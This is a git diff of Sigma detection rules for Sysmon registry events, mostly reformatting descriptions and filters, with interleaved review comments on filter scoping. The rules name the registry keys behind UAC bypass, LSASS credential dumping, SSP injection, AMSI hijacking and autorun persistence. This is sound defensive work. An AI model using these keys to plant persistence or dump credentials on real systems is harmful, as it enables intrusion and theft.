b/sigma/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml 
@@ -1,9 +1,7 @@ title: Shell Open Registry Keys Manipulation id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 status: test -description: Detects the shell open key manipulation (exefile and ms-settings) used - for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, - slui.exe via registry keys (e.g. UACMe 33 or 62) +description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) references: - https://github.com/hfiref0x/UACME - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ @@ -29,20 +27,19 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection1: - EventType: SetValue + EventType: SetValue TargetObject|endswith: Classes\ms-settings\shell\open\command\SymbolicLinkValue Details|contains: \Software\Classes\{ selection2: TargetObject|endswith: Classes\ms-settings\shell\open\command\DelegateExecute selection3: - EventType: SetValue + EventType: SetValue TargetObject|endswith: - Classes\ms-settings\shell\open\command\(Default) - Classes\exefile\shell\open\command\(Default) filter_sel3: Details: (Empty) - condition: registry_event and (selection1 or selection2 or (selection3 and not - filter_sel3)) + condition: registry_event and (selection1 or selection2 or (selection3 and not filter_sel3)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml b/sigma/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml index ff4988e05..38c1cbbfd 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml 
@@ -1,11 +1,10 @@ title: Potential Credential Dumping Via LSASS SilentProcessExit Technique id: 55e29995-75e7-451a-bef0-6225e2f13597 related: - - id: 36803969-5421-41ec-b92f-8500f79c23b0 - type: similar + - id: 36803969-5421-41ec-b92f-8500f79c23b0 + type: similar status: test -description: Detects changes to the Registry in which a monitor program gets registered - to dump the memory of the lsass.exe process +description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process references: - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ diff --git a/sigma/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml b/sigma/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml index 46cc8eb4d..bc246c71e 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml @@ -1,8 +1,7 @@ title: Security Support Provider (SSP) Added to LSA Configuration id: eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc status: test -description: Detects the addition of a SSP to the registry. Upon a reboot or API call, - SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. +description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. references: - https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/ author: iwillkeepwatch diff --git a/sigma/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml b/sigma/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml index 3cbc24e17..dfc56925b 100644 
--- a/sigma/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml @@ -1,9 +1,7 @@ title: Sticky Key Like Backdoor Usage - Registry id: baca5663-583c-45f9-b5dc-ea96a22ce542 status: test -description: Detects the usage and installation of a backdoor that uses an option - to register a malicious debugger for built-in tools that are accessible in the - login screen +description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ diff --git a/sigma/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml b/sigma/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml index 1b5c73924..382b76021 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,8 +1,7 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b status: test -description: Detects creation/modification of Assistive Technology applications and - persistence with usage of 'at' +description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ diff --git a/sigma/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml b/sigma/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml index 11c5c5aea..f6053ae6e 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml 
+++ b/sigma/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml @@ -1,8 +1,7 @@ title: Suspicious Run Key from Download id: 9c5037d1-c568-49b3-88c7-9846a5bdc2be status: test -description: Detects the suspicious RUN keys created by software located in Download - or temporary Outlook/Internet Explorer directories +description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories references: - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml b/sigma/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml index 8ca789567..0fbe965a3 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml @@ -1,8 +1,7 @@ title: DLL Load via LSASS id: b3503044-60ce-4bf4-bbcb-e3db98788823 status: test -description: Detects a method to load DLL via LSASS process using an undocumented - Registry key +description: Detects a method to load DLL via LSASS process using an undocumented Registry key references: - https://blog.xpnsec.com/exploring-mimikatz-part-1/ - https://twitter.com/SBousseaden/status/1183745981189427200 diff --git a/sigma/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml b/sigma/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml index 5e5787662..1dfe8ead7 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml 
@@ -1,8 +1,7 @@ title: Suspicious Camera and Microphone Access id: 62120148-6b7a-42be-8b91-271c04e281a3 status: test -description: Detects Processes accessing the camera and microphone from suspicious - folder +description: Detects Processes accessing the camera and microphone from suspicious folder references: - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072 author: Den Iuzvyk @@ -41,7 +40,6 @@ detection: - :#Users#Desktop# condition: registry_event and (all of selection_*) falsepositives: - - Unlikely, there could be conferencing software running from a Temp folder accessing - the devices + - Unlikely, there could be conferencing software running from a Temp folder accessing the devices level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml b/sigma/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml index bb82190d6..160995079 100644 --- a/sigma/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml +++ b/sigma/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml @@ -1,8 +1,7 @@ title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback id: 4d431012-2ab5-4db7-a84e-b29809da2172 status: experimental -description: Detects enabling of the "AllowAnonymousCallback" registry value, which - allows a remote connection between computers that do not have a trust relationship. +description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. references: - https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista author: X__Junior (Nextron Systems) 
diff --git a/sigma/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml b/sigma/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml index 7cd336df4..8b3fda6ba 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml @@ -1,8 +1,7 @@ title: Registry Persistence via Service in Safe Mode id: 1547e27c-3974-43e2-a7d7-7f484fb928ec status: experimental -description: Detects the modification of the registry to allow a driver or service - to persist in Safe Mode. +description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network diff --git a/sigma/sysmon/registry/registry_set/registry_set_add_port_monitor.yml b/sigma/sysmon/registry/registry_set/registry_set_add_port_monitor.yml index 2fa0208e3..51d5ae90e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_add_port_monitor.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_add_port_monitor.yml 
@@ -1,13 +1,9 @@ title: Add Port Monitor Persistence in Registry id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e status: experimental -description: 'Adversaries may use port monitors to run an attacker supplied DLL during - system boot for persistence or privilege escalation. - - A port monitor can be set through the AddMonitor API call to set a DLL to be loaded - at startup. - - ' +description: | + Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. + A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md author: frack113 @@ -29,10 +25,9 @@ detection: Details|endswith: .dll filter_cutepdf: Image: C:\Windows\System32\spoolsv.exe - TargetObject|contains: \System\CurrentControlSet\Control\Print\Monitors\CutePDF - Writer Monitor v4.0\Driver + TargetObject|contains: \System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver Details: cpwmon64_v40.dll - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI filter_leg1: diff --git a/sigma/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml index 5970efb1f..0a5fb6286 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml 
@@ -1,9 +1,7 @@ title: Add Debugger Entry To AeDebug For Persistence id: 092af964-4233-4373-b4ba-d86ea2890288 status: experimental -description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" - key in order to achieve persistence which will get invoked when an application - crashes +description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes references: - https://persistence-info.github.io/Data/aedebug.html - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging @@ -27,7 +25,6 @@ detection: Details: '"C:\WINDOWS\system32\vsjitdebugger.exe" -p %ld -e %ld -j 0x%p' condition: registry_set and (selection and not filter) falsepositives: - - Legitimate use of the key to setup a debugger. Which is often the case on developers - machines + - Legitimate use of the key to setup a debugger. Which is often the case on developers machines level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml b/sigma/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml index de3c0e651..28ee8f76b 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml @@ -1,8 +1,7 @@ title: Allow RDP Remote Assistance Feature id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b status: experimental -description: Detect enable rdp feature to allow specific user to rdp connect on the - targeted machine +description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 
diff --git a/sigma/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml b/sigma/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml index 21bdcf8af..ee5563773 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml @@ -1,11 +1,7 @@ title: Potential AMSI COM Server Hijacking id: 160d2780-31f7-4922-8b3a-efce30e63e96 status: experimental -description: Detects changes to the AMSI come server registry key in order disable - AMSI scanning functionalities. When AMSI attempts to starts its COM component, - it will query its registered CLSID and return a non-existent COM server. This - causes a load failure and prevents any scanning methods from being accessed, ultimately - rendering AMSI useless +description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless references: - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml index fb4a248e7..29e577220 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml 
@@ -1,16 +1,15 @@ title: Classes Autorun Keys Modification id: 9df5f547-c86a-433e-b533-f2794357e242 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -52,6 +51,7 @@ detection: Image: C:\Windows\System32\drvinst.exe filter_svchost: Image: C:\Windows\System32\svchost.exe + # If more targets are found from "svchost". Please exclude the whole image TargetObject|contains: \lnkfile\shellex\ContextMenuHandlers\ condition: registry_set and (all of selection_* and not 1 of filter_*) fields: @@ -60,8 +60,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml index a6500843e..b7237eef4 100644 
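Review bot: The new comment on `filter_svchost` (`# If more targets are found from "svchost". Please exclude the whole image`) steers future tuners toward suppressing every Classes-ASEP write made by `C:\Windows\System32\svchost.exe`, which would be a blind spot rather than a tuning step, since svchost.exe is a process adversaries routinely host code in and the exclusion would then hide their autorun writes too. Prefer keeping the filter scoped by `TargetObject` and growing that list, and reword the comment accordingly, e.g. `# If more legitimate svchost targets are found, add them to this TargetObject list rather than excluding the whole image`. The hunk's `condition` uses `not 1 of filter_*`, so any broadened filter here removes events from the whole rule, not just from this selection.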
--- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml @@ -1,17 +1,16 @@ title: Common Autorun Keys Modification id: f59c3faf-50f3-464b-9f4c-1b67ab512d99 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - - https://persistence-info.github.io/Data/userinitmprlogonscript.html -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split), wagga (name) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys + - https://persistence-info.github.io/Data/userinitmprlogonscript.html # UserInitMprLogonScript +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) date: 2019/10/25 modified: 2023/08/17 tags: 
@@ -48,15 +47,15 @@ detection: filter_empty: Details: (Empty) filter_msoffice: - - TargetObject|contains: - - \Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PROTOCOLS\Handler\ - - \ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\ - - Details: - - '{314111c7-a502-11d2-bbca-00c04f8ec294}' - - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}' - - '{42089D2D-912D-4018-9087-2B87803E93FB}' - - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}' - - '{807583E5-5146-11D5-A672-00B0D022E945}' + - TargetObject|contains: + - \Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PROTOCOLS\Handler\ + - \ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\ + - Details: + - '{314111c7-a502-11d2-bbca-00c04f8ec294}' + - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}' + - '{42089D2D-912D-4018-9087-2B87803E93FB}' + - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}' + - '{807583E5-5146-11D5-A672-00B0D022E945}' filter_chrome: TargetObject|contains: \SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} filter_edge: @@ -74,8 +73,7 @@ detection: Image|endswith: \OfficeClickToRun.exe condition: registry_set and (main_selection and not 1 of filter_*) falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml index fec6def6b..e316d08de 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml 
@@ -1,16 +1,15 @@ title: CurrentControlSet Autorun Keys Modification id: f674e36a-4b91-431e-8aef-f8a96c2aca35 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -49,7 +48,7 @@ detection: filter_onenote: Image: C:\Windows\System32\spoolsv.exe TargetObject|contains: Print\Monitors\Appmon\Ports\Microsoft.Office.OneNote_ - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI filter_poqexec: @@ -66,8 +65,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml index d1b3d126c..c9edd1252 100644 
--- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml @@ -1,17 +1,16 @@ title: CurrentVersion Autorun Keys Modification id: 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: 
@@ -50,28 +49,28 @@ detection: - \Authentication\Credential Providers - \Authentication\Credential Provider Filters filter_all: - - Details: (Empty) - - TargetObject|endswith: \NgcFirst\ConsecutiveSwitchCount - - Image|endswith: - - \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe - - \AppData\Roaming\Spotify\Spotify.exe - - \AppData\Local\WebEx\WebexHost.exe - - Image: - - C:\WINDOWS\system32\devicecensus.exe - - C:\Windows\system32\winsat.exe - - C:\Program Files\Microsoft OneDrive\StandaloneUpdater\OneDriveSetup.exe - - C:\Program Files\Microsoft OneDrive\Update\OneDriveSetup.exe - - C:\Program Files (x86)\Microsoft OneDrive\Update\OneDriveSetup.exe - - C:\Program Files\KeePass Password Safe 2\ShInstUtil.exe - - C:\Program Files\Everything\Everything.exe - - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe + - Details: (Empty) + - TargetObject|endswith: \NgcFirst\ConsecutiveSwitchCount + - Image|endswith: + - \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe # C:\Users\*\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe + - \AppData\Roaming\Spotify\Spotify.exe + - \AppData\Local\WebEx\WebexHost.exe + - Image: + - C:\WINDOWS\system32\devicecensus.exe + - C:\Windows\system32\winsat.exe + - C:\Program Files\Microsoft OneDrive\StandaloneUpdater\OneDriveSetup.exe + - C:\Program Files\Microsoft OneDrive\Update\OneDriveSetup.exe + - C:\Program Files (x86)\Microsoft OneDrive\Update\OneDriveSetup.exe + - C:\Program Files\KeePass Password Safe 2\ShInstUtil.exe + - C:\Program Files\Everything\Everything.exe + - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_logonui: Image: C:\Windows\system32\LogonUI.exe TargetObject|contains: - - \Authentication\Credential Providers\{D6886603-9D2F-4EB2-B667-1971041FA96B}\ - - \Authentication\Credential Providers\{BEC09223-B018-416D-A0AC-523971B639F5}\ - - \Authentication\Credential Providers\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\ - - 
\Authentication\Credential Providers\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\ + - \Authentication\Credential Providers\{D6886603-9D2F-4EB2-B667-1971041FA96B}\ # PIN + - \Authentication\Credential Providers\{BEC09223-B018-416D-A0AC-523971B639F5}\ # fingerprint + - \Authentication\Credential Providers\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\ # facial recognizion + - \Authentication\Credential Providers\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\ # Trusted Signal (Phone proximity, Network location) filter_edge: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\ @@ -82,8 +81,7 @@ detection: TargetObject|contains: DropboxExt Details|endswith: A251-47B7-93E1-CDD82E34AF8B} filter_opera: - TargetObject|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Opera - Browser Assistant + TargetObject|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Opera Browser Assistant Details: C:\Program Files\Opera\assistant\browser_assistant.exe filter_itunes: TargetObject|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iTunesHelper @@ -143,11 +141,10 @@ detection: Details: C:\Program Files\Aurora-Agent\tools\aurora-dashboard.exe filter_everything: TargetObject|endswith: \Microsoft\Windows\CurrentVersion\Run\Everything - Details|endswith: \Everything\Everything.exe" -startup + Details|endswith: \Everything\Everything.exe" -startup # We remove the starting part as it could be installed in different locations condition: registry_set and (all of current_version_* and not 1 of filter_*) falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma 
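Review bot: The trailing comment on the third `filter_logonui` entry has a typo, `# facial recognizion`, which should read `# facial recognition`; the other three annotations in that list are fine. On the reindented `filter_all` block just above it, the `Image|endswith` exclusions are relative paths under `\AppData\...`, which is user-writable, so they exclude any binary placed at that relative path rather than a specific installed component, unlike the absolute paths in the `Image:` list below them; I would note that limitation in a comment on the `Image|endswith:` line, e.g. `# relative user-profile paths: weaker than the absolute entries below, any image at this path is excluded`. The `filter_all` and `filter_logonui` definitions are complete within the hunk, but `detection:` continues outside it.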
diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml index 3ccd8a9a4..662ff66fa 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml @@ -1,16 +1,15 @@ title: CurrentVersion NT Autorun Keys Modification id: cbf93e5d-ca6c-4722-8bea-e9119007c248 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: 
